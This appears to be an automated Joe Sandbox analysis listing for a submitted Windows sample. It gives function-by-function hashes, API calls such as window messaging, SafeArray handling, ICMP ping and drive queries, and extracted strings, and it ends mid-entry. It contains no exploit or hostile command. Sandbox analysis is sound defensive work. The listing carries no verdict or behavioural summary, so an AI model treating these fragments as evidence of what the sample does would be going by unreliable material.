                                                • Opcode ID: 2489b02105b855a2a666d3dd084609dcbd1cd21d55e54342ad7fcf7a47b5e83c
                                                • Instruction ID: 0844a0d1d8f64375e0c29ade3eba7a4cae64ec9b91d597a085ad08ccfb2c0998
                                                • Opcode Fuzzy Hash: 2489b02105b855a2a666d3dd084609dcbd1cd21d55e54342ad7fcf7a47b5e83c
                                                • Instruction Fuzzy Hash: 57618A35511600DFDB369F18D988BA5B7F9FF94311F18492DE08287AB1CBB4A8D0DBA0
                                                APIs
                                                  • Part of subcall function 00ABB526: GetWindowLongW.USER32(?,000000EB), ref: 00ABB537
                                                • GetSysColor.USER32(0000000F), ref: 00ABB438
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ColorLongWindow
                                                • String ID:
                                                • API String ID: 259745315-0
                                                • Opcode ID: 4a8c3a392241873494a82680d1571f918be6cf8cd058c22eb2927bb7097b55d5
                                                • Instruction ID: 2154bc1a28ef5530732fe628bc52de4126a7f7feb051bf01fdccc51834819cb1
                                                • Opcode Fuzzy Hash: 4a8c3a392241873494a82680d1571f918be6cf8cd058c22eb2927bb7097b55d5
                                                • Instruction Fuzzy Hash: B8417F310101409FDB245F28DC89BF93B69FB06722F5842A1F9659B1E7DBB08C42D731
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                • String ID:
                                                • API String ID: 136442275-0
                                                • Opcode ID: 54dc04a9f55b02871be081bfc016f651e36e099fe9c94ea0236861c6cd47f413
                                                • Instruction ID: 39a3315bbf7518dda78de045c79ac2d6d43930c06ceb9b8127b7b08b6b2d2785
                                                • Opcode Fuzzy Hash: 54dc04a9f55b02871be081bfc016f651e36e099fe9c94ea0236861c6cd47f413
                                                • Instruction Fuzzy Hash: 14413D7688511CAECF66EB90CD46ECF73BCEB44350F0045E6B659A2051EA30ABE88F54
                                                APIs
                                                • CharLowerBuffW.USER32(00B3DC00,00B3DC00,00B3DC00), ref: 00AED7CE
                                                • GetDriveTypeW.KERNEL32(?,00B53A70,00000061), ref: 00AED898
                                                • _wcscpy.LIBCMT ref: 00AED8C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                • API String ID: 2820617543-1000479233
                                                • Opcode ID: 01186aaad7fb791313ca312ad2abc0cdd64ce247034f9340a36b3abf5eb6da78
                                                • Instruction ID: 376f2ad335d89497f5f6ab2b361bc294a741383e8e5ac8b8154f51fb2057a6f5
                                                • Opcode Fuzzy Hash: 01186aaad7fb791313ca312ad2abc0cdd64ce247034f9340a36b3abf5eb6da78
                                                • Instruction Fuzzy Hash: A251A131104340AFC710EF15D981BAEB7E5EF85754F10896DF99A572A2DB31DD09CB82
                                                APIs
                                                • __swprintf.LIBCMT ref: 00AA93AB
                                                • __itow.LIBCMT ref: 00AA93DF
                                                  • Part of subcall function 00AC1557: _xtow@16.LIBCMT ref: 00AC1578
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: __itow__swprintf_xtow@16
                                                • String ID: %.15g$0x%p$False$True
                                                • API String ID: 1502193981-2263619337
                                                • Opcode ID: 1404c0449397ef44cd6ee97bebf743ae94878705f7d99cea2a74a6b0f6460b3a
                                                • Instruction ID: ebcc4504e91c2ce4be6ef0e8775a0ef1e1d0608a9c65a1d5bf5c04646c6c7e20
                                                • Opcode Fuzzy Hash: 1404c0449397ef44cd6ee97bebf743ae94878705f7d99cea2a74a6b0f6460b3a
                                                • Instruction Fuzzy Hash: 2441B471604205EFDB24DB78DA41FAA73F8EB45310F2444AEE54AD72D2EB319941CB61
                                                APIs
                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B0A259
                                                • CreateCompatibleDC.GDI32(00000000), ref: 00B0A260
                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B0A273
                                                • SelectObject.GDI32(00000000,00000000), ref: 00B0A27B
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B0A286
                                                • DeleteDC.GDI32(00000000), ref: 00B0A28F
                                                • GetWindowLongW.USER32(?,000000EC), ref: 00B0A299
                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B0A2AD
                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B0A2B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                • String ID: static
                                                • API String ID: 2559357485-2160076837
                                                • Opcode ID: 5454a2f99c9f9b098166b75f531c0359e2696abc60e0cfa5bbe023011f1db9b3
                                                • Instruction ID: 25bf8a410bca2282d1e5562bfb7b22668da688d5b4b3de3a6cf77e0459e5c230
                                                • Opcode Fuzzy Hash: 5454a2f99c9f9b098166b75f531c0359e2696abc60e0cfa5bbe023011f1db9b3
                                                • Instruction Fuzzy Hash: ED316F31100215AFDF225FA4DC49FDA3FA9FF19361F100664FA19A61E0CB35D821DB65
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                • API String ID: 2620052-3771769585
                                                • Opcode ID: fdd8974771068f1e515b51a8bd15e7a84206250423fa471e57956fd282518fef
                                                • Instruction ID: 53be1e331c557616bed99ffd70a413cc8a3f63ece85a6d560e0a856540c8bd0e
                                                • Opcode Fuzzy Hash: fdd8974771068f1e515b51a8bd15e7a84206250423fa471e57956fd282518fef
                                                • Instruction Fuzzy Hash: 66110671904114AFCB25AB71AD0AFDA77BCEF50711F1105A9F005A7091EF74DE868B50
                                                APIs
                                                • _memset.LIBCMT ref: 00AC5047
                                                  • Part of subcall function 00AC7C0E: __getptd_noexit.LIBCMT ref: 00AC7C0E
                                                • __gmtime64_s.LIBCMT ref: 00AC50E0
                                                • __gmtime64_s.LIBCMT ref: 00AC5116
                                                • __gmtime64_s.LIBCMT ref: 00AC5133
                                                • __allrem.LIBCMT ref: 00AC5189
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC51A5
                                                • __allrem.LIBCMT ref: 00AC51BC
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC51DA
                                                • __allrem.LIBCMT ref: 00AC51F1
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC520F
                                                • __invoke_watson.LIBCMT ref: 00AC5280
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                • String ID:
                                                • API String ID: 384356119-0
                                                • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                • Instruction ID: 2331263b83b166a5208bb02badb9af08a876dab4dea634c9bde5f1ac661a2193
                                                • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                • Instruction Fuzzy Hash: 7471B5B1E01B16ABD714AF7CCD42F9A73E8AF10764F15422EF911D6281E770E9808BD0
                                                APIs
                                                • _memset.LIBCMT ref: 00AE4DF8
                                                • GetMenuItemInfoW.USER32(00B61708,000000FF,00000000,00000030), ref: 00AE4E59
                                                • SetMenuItemInfoW.USER32(00B61708,00000004,00000000,00000030), ref: 00AE4E8F
                                                • Sleep.KERNEL32(000001F4), ref: 00AE4EA1
                                                • GetMenuItemCount.USER32(?), ref: 00AE4EE5
                                                • GetMenuItemID.USER32(?,00000000), ref: 00AE4F01
                                                • GetMenuItemID.USER32(?,-00000001), ref: 00AE4F2B
                                                • GetMenuItemID.USER32(?,?), ref: 00AE4F70
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AE4FB6
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE4FCA
                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE4FEB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                • String ID:
                                                • API String ID: 4176008265-0
                                                • Opcode ID: 6a91afd5898e61992e31a9a4b7673eac151bcf027d71685abe56b8a5152e9fc5
                                                • Instruction ID: 28e9b81c0afa347bd6fc8559c2ad98d1358a713bc2a945b55763877fb4d4df10
                                                • Opcode Fuzzy Hash: 6a91afd5898e61992e31a9a4b7673eac151bcf027d71685abe56b8a5152e9fc5
                                                • Instruction Fuzzy Hash: 9C61BF71900289AFDF21CFA9D988EAE7BBCFB09B08F140559F402A7291D770AD05CB20
                                                APIs
                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B09C98
                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B09C9B
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00B09CBF
                                                • _memset.LIBCMT ref: 00B09CD0
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B09CE2
                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B09D5A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow_memset
                                                • String ID:
                                                • API String ID: 830647256-0
                                                • Opcode ID: 325b4d7cbbe338d42f81e5fd347fd921f329c5306c914319688c26eebf7f7e73
                                                • Instruction ID: 02ab5e6ba83ad41fa50351731e5b762e86634243ac05a33ac44eb1394f262746
                                                • Opcode Fuzzy Hash: 325b4d7cbbe338d42f81e5fd347fd921f329c5306c914319688c26eebf7f7e73
                                                • Instruction Fuzzy Hash: B2617B75900208AFDB21DFA8CC81EEE7BF8EB09704F1445A9FA05A72E2D774AD45DB50
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00AD94FE
                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00AD9549
                                                • VariantInit.OLEAUT32(?), ref: 00AD955B
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00AD957B
                                                • VariantCopy.OLEAUT32(?,?), ref: 00AD95BE
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00AD95D2
                                                • VariantClear.OLEAUT32(?), ref: 00AD95E7
                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00AD95F4
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AD95FD
                                                • VariantClear.OLEAUT32(?), ref: 00AD960F
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AD961A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: a5733f240527dd559e20eefc1783b8c5d4689f61205b1722ca998fedbd28483d
                                                • Instruction ID: 9717788d780cabe8d3b8f1cae7756e6b45279dc6a5a54aa77843b2d04b43df1d
                                                • Opcode Fuzzy Hash: a5733f240527dd559e20eefc1783b8c5d4689f61205b1722ca998fedbd28483d
                                                • Instruction Fuzzy Hash: F6413F75900219AFCB11EFA4D8449DEBF79FF08354F108066F512A7361DB31EA46CBA1
                                                APIs
                                                  • Part of subcall function 00AA936C: __swprintf.LIBCMT ref: 00AA93AB
                                                  • Part of subcall function 00AA936C: __itow.LIBCMT ref: 00AA93DF
                                                • CoInitialize.OLE32 ref: 00AFADF6
                                                • CoUninitialize.OLE32 ref: 00AFAE01
                                                • CoCreateInstance.OLE32(?,00000000,00000017,00B2D8FC,?), ref: 00AFAE61
                                                • IIDFromString.OLE32(?,?), ref: 00AFAED4
                                                • VariantInit.OLEAUT32(?), ref: 00AFAF6E
                                                • VariantClear.OLEAUT32(?), ref: 00AFAFCF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                • API String ID: 834269672-1287834457
                                                • Opcode ID: 5223f3412eaf094b515429dba6e1a28bcb2a737bfc94154cd864531041a28d80
                                                • Instruction ID: 3ec7e54bf06aef327b9e932a73aa7e0456ef0c4ae798c51170354198e9b0d5de
                                                • Opcode Fuzzy Hash: 5223f3412eaf094b515429dba6e1a28bcb2a737bfc94154cd864531041a28d80
                                                • Instruction Fuzzy Hash: 5D61ACB12083159FD710DF94C948BABB7E8AF58754F14444DFA899B291C770ED48CB93
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 00AF8168
                                                • inet_addr.WSOCK32(?,?,?), ref: 00AF81AD
                                                • gethostbyname.WSOCK32(?), ref: 00AF81B9
                                                • IcmpCreateFile.IPHLPAPI ref: 00AF81C7
                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AF8237
                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AF824D
                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00AF82C2
                                                • WSACleanup.WSOCK32 ref: 00AF82C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                • String ID: Ping
                                                • API String ID: 1028309954-2246546115
                                                • Opcode ID: 78954e06fb4255b260b8ec255ead2ca4c466982f28e2e0873eb935b8568acdfb
                                                • Instruction ID: ef726d4a97a59b0cfebfb0f30628f45c16c0e7081d3a0b5919f7afd75de6e45b
                                                • Opcode Fuzzy Hash: 78954e06fb4255b260b8ec255ead2ca4c466982f28e2e0873eb935b8568acdfb
                                                • Instruction Fuzzy Hash: AA518F316047049FDB209FA4CD45BBABBE4AF49720F048929FA66DB2A1DF74E901CB41
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 00AEE396
                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00AEE40C
                                                • GetLastError.KERNEL32 ref: 00AEE416
                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 00AEE483
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                • API String ID: 4194297153-14809454
                                                • Opcode ID: 728298f342a19e2b684872f4506c44ee1d0aef61eb36732d91a5e132ebe67911
                                                • Instruction ID: 2bb8f735b38111f820e56d3b32dfc340b9a67a168e6e486885a93bdd3ef0d7b7
                                                • Opcode Fuzzy Hash: 728298f342a19e2b684872f4506c44ee1d0aef61eb36732d91a5e132ebe67911
                                                • Instruction Fuzzy Hash: 7F31C435A002499FDB01EF69C945FAEBBF4EF09700F148065E906EB2D1DB719A02CB51
                                                APIs
                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00ADB98C
                                                • GetDlgCtrlID.USER32 ref: 00ADB997
                                                • GetParent.USER32 ref: 00ADB9B3
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ADB9B6
                                                • GetDlgCtrlID.USER32(?), ref: 00ADB9BF
                                                • GetParent.USER32(?), ref: 00ADB9DB
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ADB9DE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1383977212-1403004172
                                                • Opcode ID: c8e811a50ce1e25822f51932363def5d2bc5d64b75f7b08fbbcd5984ba8eb78c
                                                • Instruction ID: f7ecc21bde4ecb1988cc4fc95f15fe10b67cc21b57fc8d7dcf32b8da54679186
                                                • Opcode Fuzzy Hash: c8e811a50ce1e25822f51932363def5d2bc5d64b75f7b08fbbcd5984ba8eb78c
                                                • Instruction Fuzzy Hash: 2C21A174900104BFDB15ABA4CC96EBEBBB5EB4A310B10015AF662932E1DB795816DB70
                                                APIs
                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00ADBA73
                                                • GetDlgCtrlID.USER32 ref: 00ADBA7E
                                                • GetParent.USER32 ref: 00ADBA9A
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ADBA9D
                                                • GetDlgCtrlID.USER32(?), ref: 00ADBAA6
                                                • GetParent.USER32(?), ref: 00ADBAC2
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ADBAC5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1383977212-1403004172
                                                • Opcode ID: 8918532cfc5cb2abf041d059584706e312ecd4aa0b2ca07117a90fad6a10985a
                                                • Instruction ID: 183213f9c967d7613034eec446e14e0bbb95caafdb9b0c1604c2ba2ba646df5a
                                                • Opcode Fuzzy Hash: 8918532cfc5cb2abf041d059584706e312ecd4aa0b2ca07117a90fad6a10985a
                                                • Instruction Fuzzy Hash: 6E21B374900104BFDB11ABA4CC85EFEB7B5EF4A300F100016F552932E1DB79591ADB70
                                                APIs
                                                • GetParent.USER32 ref: 00ADBAE3
                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00ADBAF8
                                                • _wcscmp.LIBCMT ref: 00ADBB0A
